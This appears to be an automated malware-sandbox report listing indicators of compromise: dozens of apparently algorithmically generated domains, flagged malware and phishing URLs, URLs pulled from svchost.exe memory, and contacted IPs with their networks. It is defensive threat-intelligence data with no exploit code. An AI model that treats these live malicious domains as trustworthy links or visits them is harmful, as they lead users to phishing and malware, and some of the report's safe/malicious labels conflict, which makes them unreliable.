http://vojyqem.com/login.php	100%	Avira URL Cloud	malware
http://puzylyp.com/login.phpMy	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular	0%	Avira URL Cloud	safe
http://qegyval.com/login.php	100%	Avira URL Cloud	malware
http://vocyzit.com/login	100%	Avira URL Cloud	malware
http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco	100%	Avira URL Cloud	malware
http://gahyhiz.com/login.php	0%	Avira URL Cloud	safe
http://gadyniw.com/login.php	100%	Avira URL Cloud	malware
http://pupydeq.com/login.php	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/pics/29590/bg1.png)	0%	Avira URL Cloud	safe
http://106.15.137.66:8001/dh/147287063_637385.html	0%	Avira URL Cloud	safe
http://lygyvuj.com/login.php	100%	Avira URL Cloud	phishing
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	0%	Avira URL Cloud	safe
https://img.sedoparking.com/templates/images/hero_nc.svg	0%	Avira URL Cloud	safe
http://gadyciz.com/login.php	100%	Avira URL Cloud	malware
http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D	100%	Avira URL Cloud	malware
http://ww3.galyqaz.com/	100%	Avira URL Cloud	phishing
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcom	0%	Avira URL Cloud	safe
http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold	0%	Avira URL Cloud	safe
https://qegyhig.com//	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix	0%	Avira URL Cloud	safe
http://gadyniw.com/login.php3	100%	Avira URL Cloud	malware
http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o	100%	Avira URL Cloud	malware
http://www.gahyqah.com/login.phpP	100%	Avira URL Cloud	malware
https://dts.gnpge.com	0%	Avira URL Cloud	safe
http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	100%	Avira URL Cloud	malware
http://gatyhub.com/login.php	100%	Avira URL Cloud	malware
https://www.namecheap.com/domains/registration/results/?domain=gahyqah.com	0%	Avira URL Cloud	safe
http://lyvyxor.com/login.php_L	100%	Avira URL Cloud	malware
https://cdn.consentmanager.net	0%	Avira URL Cloud	safe
http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181	100%	Avira URL Cloud	malware
https://lysyvan.com/	100%	Avira URL Cloud	malware
http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c	100%	Avira URL Cloud	malware
https://lysyvan.com/wp-json/	100%	Avira URL Cloud	malware
http://qegyhig.com/login.phpAppData	100%	Avira URL Cloud	malware
http://lysyfyj.com/login.php	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/pics/28903/search.png)	0%	Avira URL Cloud	safe
http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf	0%	Avira URL Cloud	safe
http://vocyzit.com/login.php	100%	Avira URL Cloud	malware
http://galyqaz.com/login.php	100%	Avira URL Cloud	malware
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0	0%	Avira URL Cloud	safe
http://www.gahyqah.com/login.php	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot	0%	Avira URL Cloud	safe
http://www.google.com	0%	Avira URL Cloud	safe
https://qegyhig.com/wp-json/	100%	Avira URL Cloud	malware
http://gatyfus.com/login.phpd%	100%	Avira URL Cloud	malware
http://gatyfus.com/login.php	100%	Avira URL Cloud	malware
http://www.google.coml	0%	Avira URL Cloud	safe
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com	0%	Avira URL Cloud	safe
https://delivery.consentmanager.net	0%	Avira URL Cloud	safe
http://www.google.comt	0%	Avira URL Cloud	safe
http://galyqaz.com/login.php0	100%	Avira URL Cloud	malware
https://qegyhig.com/login.php	100%	Avira URL Cloud	malware
https://qegyhig.com/	100%	Avira URL Cloud	malware
http://lysyvan.com/login.php	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	0%	Avira URL Cloud	safe
http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)	0%	Avira URL Cloud	safe
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/	0%	Avira URL Cloud	safe
http://qetyfuv.com/login.php	100%	Avira URL Cloud	malware
http://qexyhuv.com/login.php	100%	Avira URL Cloud	malware
http://vonypom.com/login.php	100%	Avira URL Cloud	malware
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	0%	Avira URL Cloud	safe
http://pupycag.com/login.php	100%	Avira URL Cloud	phishing
http://vofycot.com/login.php	100%	Avira URL Cloud	malware
http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4	100%	Avira URL Cloud	malware
https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	0%	Avira URL Cloud	safe
http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV	100%	Avira URL Cloud	malware
http://ww3.galyqaz.com/DigiCert	100%	Avira URL Cloud	phishing
http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/js/min.js?v2.3	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	0%	Avira URL Cloud	safe
https://qegyhig.com/m/	100%	Avira URL Cloud	malware
https://lysyvan.com/login.php	100%	Avira URL Cloud	malware
http://gadyniw.com/login.php/	100%	Avira URL Cloud	malware
http://qegyhig.com/login.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pupydeq.com	13.248.169.48	true	true	unknown
pupycag.com	18.208.156.248	true	true	unknown
lyvyxor.com	208.100.26.245	true	true	unknown
77026.bodis.com	199.59.243.226	true	true	unknown
lysyvan.com	188.114.97.3	true	true	unknown
galynuh.com	64.225.91.73	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	unknown
qegyhig.com	188.114.96.3	true	true	unknown
gatyfus.com	85.17.31.82	true	true	unknown
vonypom.com	18.208.156.248	true	true	unknown
puzylyp.com	3.64.163.50	true	true	unknown
qexyhuv.com	15.197.240.20	true	true	unknown
pltraffic7.com	72.52.179.174	true	true	unknown
gadyciz.com	44.221.84.105	true	true	unknown
gadyniw.com	154.212.231.82	true	true	unknown
lyxynyx.com	103.224.212.210	true	true	unknown
www.sedoparking.com	64.190.63.136	true	true	unknown
lygyvuj.com	52.34.198.229	true	true	unknown
gahyqah.com	162.255.119.102	true	true	unknown
sedoparking.com	64.190.63.136	true	true	unknown
vocyzit.com	44.221.84.105	true	true	unknown
galyqaz.com	199.191.50.83	true	true	unknown
vofycot.com	103.224.182.252	true	true	unknown
qetyhyg.com	64.225.91.73	true	true	unknown
vojyqem.com	172.234.222.143	true	true	unknown
gahyhiz.com	44.221.84.105	true	true	unknown
qetyfuv.com	44.221.84.105	true	true	unknown
lysyfyj.com	69.162.80.60	true	true	unknown
gtm-sg-6l13ukk0m05.qu200.com	103.150.11.230	true	true	unknown
lymyxid.com	3.94.10.34	true	true	unknown
qegyval.com	154.85.183.50	true	true	unknown
gatyzoz.com	unknown	unknown	true	unknown
lykygaj.com	unknown	unknown	true	unknown
qedyxel.com	unknown	unknown	true	unknown
qedyqup.com	unknown	unknown	true	unknown
qekyluv.com	unknown	unknown	true	unknown
gatyrez.com	unknown	unknown	true	unknown
vofybic.com	unknown	unknown	true	unknown
pujydag.com	unknown	unknown	true	unknown
vojykom.com	unknown	unknown	true	unknown
qetysuq.com	unknown	unknown	true	unknown
vonyzut.com	unknown	unknown	true	unknown
pufyjuq.com	unknown	unknown	true	unknown
pujytug.com	unknown	unknown	true	unknown
galyhiw.com	unknown	unknown	true	unknown
lykygun.com	unknown	unknown	true	unknown
vopymyc.com	unknown	unknown	true	unknown
gatyfaz.com	unknown	unknown	true	unknown
vojycit.com	unknown	unknown	true	unknown
lyvymej.com	unknown	unknown	true	unknown
lygyvar.com	unknown	unknown	true	unknown
purygiv.com	unknown	unknown	true	unknown
gahykeb.com	unknown	unknown	true	unknown
purymog.com	unknown	unknown	true	unknown
gadyzib.com	unknown	unknown	true	unknown
ganyqow.com	unknown	unknown	true	unknown
lyxysun.com	unknown	unknown	true	unknown
puzyjyg.com	unknown	unknown	true	unknown
vopydek.com	unknown	unknown	true	unknown
qexyfuq.com	unknown	unknown	true	unknown
gatykyh.com	unknown	unknown	true	unknown
vocykem.com	unknown	unknown	true	unknown
gahynus.com	unknown	unknown	true	unknown
pumypop.com	unknown	unknown	true	unknown
lyvysur.com	unknown	unknown	true	unknown
puzypav.com	unknown	unknown	true	unknown
galypob.com	unknown	unknown	true	unknown
gacyqoz.com	unknown	unknown	true	unknown
lykywid.com	unknown	unknown	true	unknown
lykytin.com	unknown	unknown	true	unknown
vofyref.com	unknown	unknown	true	unknown
qekytig.com	unknown	unknown	true	unknown
vocyzek.com	unknown	unknown	true	unknown
puvypoq.com	unknown	unknown	true	unknown
puvybeg.com	unknown	unknown	true	unknown
pupydig.com	unknown	unknown	true	unknown
pupyguq.com	unknown	unknown	true	unknown
qedyqal.com	unknown	unknown	true	unknown
vowymom.com	unknown	unknown	true	unknown
purypol.com	unknown	unknown	true	unknown
ganypeb.com	unknown	unknown	true	unknown
vopymit.com	unknown	unknown	true	unknown
vowyguf.com	unknown	unknown	true	unknown
pupytiq.com	unknown	unknown	true	unknown
lymyfoj.com	unknown	unknown	true	unknown
vowyzuf.com	unknown	unknown	true	unknown
gatyruw.com	unknown	unknown	true	unknown
qebynyg.com	unknown	unknown	true	unknown
puzymev.com	unknown	unknown	true	unknown
pupymol.com	unknown	unknown	true	unknown
vojycif.com	unknown	unknown	true	unknown
qebyvyl.com	unknown	unknown	true	unknown
lymysan.com	unknown	unknown	true	unknown
qekynuq.com	unknown	unknown	true	unknown
puryjil.com	unknown	unknown	true	unknown
puvytuv.com	unknown	unknown	true	unknown
galyzus.com	unknown	unknown	true	unknown
gadyfuh.com	unknown	unknown	true	unknown
vofycyk.com	unknown	unknown	true	unknown
lyxywer.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lyvyxor.com/login.php	true	Avira URL Cloud: malware	unknown
http://lyrysor.com/login.php	true	Avira URL Cloud: phishing	unknown
http://puzylyp.com/login.php	true	Avira URL Cloud: malware	unknown
http://lyxynyx.com/login.php	true	Avira URL Cloud: malware	unknown
http://vojyqem.com/login.php	true	Avira URL Cloud: malware	unknown
http://galynuh.com/login.php	true	Avira URL Cloud: malware	unknown
http://qetyhyg.com/login.php	true	Avira URL Cloud: phishing	unknown
http://lymyxid.com/login.php	true	Avira URL Cloud: malware	unknown
http://gadyniw.com/login.php	true	Avira URL Cloud: malware	unknown
http://gahyhiz.com/login.php	true	Avira URL Cloud: safe	unknown
http://qegyval.com/login.php	true	Avira URL Cloud: malware	unknown
http://pupydeq.com/login.php	true	Avira URL Cloud: malware	unknown
http://106.15.137.66:8001/dh/147287063_637385.html	true	Avira URL Cloud: safe	unknown
http://lygyvuj.com/login.php	true	Avira URL Cloud: phishing	unknown
http://ww3.galyqaz.com/	true	Avira URL Cloud: phishing	unknown
http://gadyciz.com/login.php	true	Avira URL Cloud: malware	unknown
http://gatyhub.com/login.php	true	Avira URL Cloud: malware	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181	true	Avira URL Cloud: malware	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c	true	Avira URL Cloud: malware	unknown
http://lysyfyj.com/login.php	true	Avira URL Cloud: malware	unknown
http://vocyzit.com/login.php	true	Avira URL Cloud: malware	unknown
http://galyqaz.com/login.php	true	Avira URL Cloud: malware	unknown
http://www.gahyqah.com/login.php	true	Avira URL Cloud: malware	unknown
http://gatyfus.com/login.php	true	Avira URL Cloud: malware	unknown
https://qegyhig.com/login.php	true	Avira URL Cloud: malware	unknown
http://lysyvan.com/login.php	true	Avira URL Cloud: malware	unknown
http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7	true	Avira URL Cloud: malware	unknown
http://qetyfuv.com/login.php	true	Avira URL Cloud: malware	unknown
http://qexyhuv.com/login.php	true	Avira URL Cloud: malware	unknown
http://vonypom.com/login.php	true	Avira URL Cloud: malware	unknown
http://pupycag.com/login.php	true	Avira URL Cloud: phishing	unknown
http://vofycot.com/login.php	true	Avira URL Cloud: malware	unknown
http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4	true	Avira URL Cloud: malware	unknown
https://lysyvan.com/login.php	true	Avira URL Cloud: malware	unknown
http://qegyhig.com/login.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://nojs.domaincntrol.com	login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.dr	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://gadyniw.com/login.phpMy	svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://galynuh.com/login.php.	svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv	svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://domaincntrol.com/?orighost=	login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.dr	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://vojyqem.com/login.phpTemp	svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://galyqaz.com/display.cfm	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://puzylyp.com/login.phpMy	svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://vocyzit.com/login	svchost.exe, 00000001.00000003.2274238543.0000000009210000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/pics/29590/bg1.png)	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco	svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
https://img.sedoparking.com/templates/images/hero_nc.svg	svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcom	svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://qegyhig.com//	svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://gadyniw.com/login.php3	svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	login[1].htm.1.dr, login[2].htm0.1.dr	false	Avira URL Cloud: malware	unknown
http://www.gahyqah.com/login.phpP	svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dts.gnpge.com	svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namecheap.com/domains/registration/results/?domain=gahyqah.com	svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lyvyxor.com/login.php_L	svchost.exe, 00000001.00000003.2195591504.00000000008A9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.consentmanager.net	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://lysyvan.com/	svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lysyvan.com/wp-json/	svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/pics/28903/search.png)	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://qegyhig.com/login.phpAppData	svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0	svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://www.google.com	svchost.exe, svchost.exe, 00000001.00000003.2886286564.000000000926D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833106604.00000000026E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910825545.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688004757.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868421198.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911227483.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.000000000088D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2913316247.0000000009232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2209935730.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898455985.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801259005.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898624617.0000000009225000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.google.coml	svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gatyfus.com/login.phpd%	svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://qegyhig.com/wp-json/	svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.comt	svchost.exe, 00000001.00000003.1681297112.000000000264B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com	svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://delivery.consentmanager.net	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/login.php0	svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://qegyhig.com/	svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/	svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://api.w.org/	svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;	svchost.exe, 00000001.00000002.2912087987.00000000026CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV	login[4].htm.1.dr	false	Avira URL Cloud: malware	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co	svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ww3.galyqaz.com/DigiCert	svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/js/min.js?v2.3	login[4].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://qegyhig.com/m/	svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gadyniw.com/login.php/	svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.94.10.34	lymyxid.com	United States	14618	AMAZON-AESUS	true
64.190.63.136	www.sedoparking.com	United States	11696	NBS11696US	true
15.197.240.20	qexyhuv.com	United States	7430	TANDEMUS	true
172.234.222.143	vojyqem.com	United States	20940	AKAMAI-ASN1EU	true
72.52.179.174	pltraffic7.com	United States	32244	LIQUIDWEBUS	true
154.85.183.50	qegyval.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
64.225.91.73	galynuh.com	United States	14061	DIGITALOCEAN-ASNUS	true
69.162.80.60	lysyfyj.com	United States	46475	LIMESTONENETWORKSUS	true
52.34.198.229	lygyvuj.com	United States	16509	AMAZON-02US	true
5.79.71.225	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
199.191.50.83	galyqaz.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
13.248.169.48	pupydeq.com	United States	16509	AMAZON-02US	true
